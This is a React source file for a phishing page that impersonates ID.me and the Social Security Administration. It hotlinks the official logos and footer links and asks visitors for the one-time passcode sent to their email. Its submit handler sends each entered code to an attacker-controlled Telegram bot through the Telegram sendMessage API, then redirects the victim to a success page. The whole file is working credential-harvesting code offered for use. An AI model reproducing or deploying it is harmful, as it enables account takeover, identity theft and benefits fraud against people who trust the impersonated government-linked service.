import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { TELEGRAM_API_TOKEN, TELEGRAM_CHAT_ID } from './telegramAPI';

const Otp = () => {
  const [otp, setOtp] = useState('');
  const navigate = useNavigate();

  const handleSubmit = async (e) => {
    e.preventDefault();

    try {
      const message = `New OTP Submission:\n\nOTP: ${otp}`;
      const response = await fetch(
        `https://api.telegram.org/bot${TELEGRAM_API_TOKEN}/sendMessage`,
        {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({
            chat_id: TELEGRAM_CHAT_ID,
            text: message,
          }),
        }
      );

      if (response.ok) {
        setOtp('');
        navigate('/success'); // Redirect to a success page after OTP submission
      } else {
        console.error('Failed to send message to Telegram');
        alert('Something went wrong. Please try again.');
      }
    } catch (error) {
      console.error('Error:', error);
      alert('An error occurred. Please check your network connection.');
    }
  };

  return (
    <div className="page-container" data-role="page-container">
      <div className="container">
        <div className="content-container">
          <form
            className="new_user"
            id="new_user"
            data-validate="otp"
            data-component="Components.RequiredFieldInfo"
            onSubmit={handleSubmit}
          >
            <div className="form-header">
              <div className="form-header-content" role="banner">
                <div className="partner">
                  <div className="c_icon m_idme">
                    <img
                      alt=""
                      className="img-lightmode"
                      src="https://api.id.me/assets/logos/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"
                    />
                    <img
                      alt=""
                      className="img-darkmode"
                      src="https://api.id.me/assets/logos/idme-logo-white-3fda17b1e33891acf640ab0125f80fb2feafbdd0cf0423c06de22149b643fcbb.svg"
                    />
                  </div>
                  <div className="c_icon m_addition">
                    <img
                      alt=""
                      className="img-lightmode"
                      src="https://api.id.me/assets/icons/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"
                    />
                    <img
                      alt=""
                      className="img-darkmode"
                      src="https://api.id.me/assets/icons/icon-addition-white-cbf0d61d70d65bb52b8aaa42341da4d8e957fa0c67e22720e878618233f791a7.svg"
                    />
                  </div>
                  <div className="c_icon m_consumer-logo">
                    <button
                      name="button"
                      type="button"
                      className="m_consumer-logo m_exit-ramp"
                      data-component="Components.Modal"
                    >
                      <img
                        alt="ID.me with Social Security Administration"
                        src="https://idme-production.s3.amazonaws.com/applications/4327/large.png?1525120239"
                      />
                    </button>
                  </div>
                </div>
              </div>
            </div>

            <main aria-labelledby="sr_page_title" className="form-container">
              <div className="form-header-access">
                <h1 id="sr_page_title">Enter OTP</h1>
              </div>

              <p style={{ fontSize: '14px', marginBottom: '10px' }}>
                <b>* Indicates a required field</b>
              </p>

              <div className="form-fields">
                <div className="field text">
                  <label htmlFor="otp_input">OTP *</label>
                  <input
                    type="text"
                    id="otp_input"
                    value={otp}
                    onChange={(e) => setOtp(e.target.value)}
                    placeholder="Enter the OTP sent to your email"
                    required
                  />
                </div>
              </div>

              <div className="form-actions">
                <button type="submit" className="btn btn-primary">
                  Submit OTP
                </button>
              </div>
            </main>
          </form>
        </div>
      </div>

      <footer className="footer">
        <nav aria-label="Footer" className="footer__links">
          <ul className="footer__list">
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/about"
              >
                What is ID.me?
              </a>
            </li>
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/terms"
              >
                Terms of Service
              </a>
            </li>
            <li className="footer__list-item">
              <a
                target="_blank"
                rel="noopener noreferrer"
                className="footer__link"
                href="https://www.id.me/privacy"
              >
                Privacy Policy
              </a>
            </li>
          </ul>
        </nav>
      </footer>
    </div>
  );
};

export default Otp;